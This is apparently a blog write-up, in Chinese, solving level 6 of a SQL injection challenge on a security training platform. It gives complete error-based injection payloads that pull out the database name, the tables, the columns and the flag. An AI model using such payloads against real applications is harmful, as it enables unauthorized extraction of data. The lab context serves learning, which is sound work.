网络信息安全攻防学习平台_注入关(第6关)_题解

题目地址:http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin

在username后加入单引号直接出现报错(其实是写这篇博客时才发现,做题时一直用的%bf%27),那么接下来的就好办了.(关于爆错注入可以先看,这里这里.然后再做一些小实验.)

首先用?username=admin'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 可以爆出当前数据库名,不过貌似没什么用…UN5P)G$K]XYX7N{C)@WQ%Z0

用?username=admin'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 更改红色数字我们可以看到这个库中有哪些表.我们发现有log,motto,user三个表.

然后使用?username=admin'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x6d6f74746f LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 第一处红字为你要爆字段的表的表名的16进制asc编码,改变第二处数字爆出所有字段.下面就是拿flag的时候了.

?username=admin' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,username,0x7e,id,0x7e,motto,0x7e) FROM motto limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 得到Duplicate entry '~#adf#ad@@#~100000~key#notfound!#~1' for key 'group_key'.

key到手

 

花絮.第六题的答案一直在往第五题那提交,再加上flag是notfound!(我还以为找错了)……我把那三个表整整翻了三遍!uyd76&*IJu^Yd啊啊啊